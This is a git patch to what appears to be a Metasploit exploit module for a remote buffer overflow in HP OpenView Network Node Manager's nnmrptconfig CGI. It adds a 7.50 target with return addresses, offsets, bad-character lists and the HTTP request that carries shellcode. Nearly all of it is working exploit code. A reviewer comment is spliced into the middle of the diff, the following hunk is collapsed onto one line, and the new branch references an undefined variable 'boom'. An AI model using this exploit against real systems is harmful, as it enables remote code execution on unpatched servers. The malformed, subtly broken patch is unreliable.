From a05866385fc66d5c9eb99992156266ac5c1b5e27 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Thu, 24 Mar 2011 02:48:04 +0000
Subject: [PATCH] Added target 7.50, provided by MC

git-svn-id: file:///home/svn/framework3/trunk@12122 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../http/hp_nnm_nnmrptconfig_nameparams.rb | 79 +++++++++++++------
 1 file changed, 57 insertions(+), 22 deletions(-)

diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
index c905fcf767..ef75ecd60c 100644
--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Author' =>
 [
 'sinn3r',
+ 'MC',
 ],
 'References' =>
 [
@@ -39,7 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Payload' =>
 {
- 'BadChars' => "\x00\x26\x2b",
+ 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+ 'StackAdjustment' => -3500,
 },
 'DefaultOptions' =>
 {
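Review bot: The widened `BadChars` string and the new `StackAdjustment` in the second hunk carry no comment saying why they changed, and because `Payload` here is a module-level hash rather than a per-target one, both values now presumably apply to the pre-existing Server 2003 target as well as the target this commit adds. A short comment above `'BadChars'` such as `# Shared by every entry in Targets; changed together with the 7.50 target (see commit message)` would make that scope explicit for the next maintainer. Whether the original target was re-verified under the changed payload constraints is not visible in this hunk.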
@@ -49,36 +51,69 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - ['Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D, 'offset'=>46913, 'Pops'=>13, 'Payloadoffset'=>57} ], + [ + 'HP NNM 7.53 Windows Server 2003 Enterprise', + { + 'Ret' => 0x5A30532D, #POP/POP/RET OvWww.dll + 'offset' => 46913, #Offset to SEH chain + 'Pops' => 13, #Number of POPADs needed + 'Payloadoffset' => 57, #Offset to pyload + } + ], + [ + 'HP OpenView Network Node Manager 7.50', + { + 'Ret' => 0x5a01d78d, #JMP + 'offset' => 5117, #Offset to overwrite EIP + } + ], ], 'Privileged' => false, - 'DisclosureDate' => "JAN 10 2011")) + 'DisclosureDate' => "Jan 10 2011")) - register_options( - [ - Opt::RPORT(80), - ], self.class) + register_options( [Opt::RPORT(80),], self.class ) end def exploit - nops = make_nops(1000)*70 + sploit = '' + data = '' - sploit = nops[0, target['offset']] - sploit << generate_seh_record(target.ret) - sploit << "\x61"*target['Pops'] - sploit << "\x51" - sploit << "\xc3" - sploit << nops[0, target['Payloadoffset']] - sploit << payload.encoded - sploit << nops[0, 70000-sploit.length] + if target.name =~ /NNM 7.53/ && target.name =~ /Server 2003/ - data = "Content&Action=Create&" - data << "Template=Avail/CRAvail&" - data << "Operation=Apply&" - data << "Params=schdParams+nameParams" - data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&" - data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1" + nops = make_nops(1000)*70 + + sploit << nops[0, target['offset']] + sploit << generate_seh_record(target.ret) + sploit << "\x61"*target['Pops'] + sploit << "\x51" + sploit << "\xc3" + sploit << nops[0, target['Payloadoffset']] + sploit << payload.encoded + sploit << nops[0, 70000-sploit.length] + + data << "Content&Action=Create&" + data << "Template=Avail/CRAvail&" + data << "Operation=Apply&" + data << "Params=schdParams+nameParams" + data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&" + data << 
"nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1" + + elsif target.name =~ /7.50/ + + #Courtersy of MC + sploit << rand_text_alpha_upper(target['offset']) + sploit << [target.ret].pack('V') + sploit << payload.encoded + sploit << rand_text_alpha_upper(8024 - 5117 - 4 - payload.encoded.length) + + data << "Content&Action=Modify&Template=Avail/General+Availabiilty/monthtodat" + data << "e&Operation=Apply&Params=schdParams+nameParams&schdParams=schd_select1%3Dmonto" + data << "date&nameParams=text1%3D#{boom}%262%3D%263%3D" + + end + + print_status("Trying target #{target.name}...") connect send_request_raw({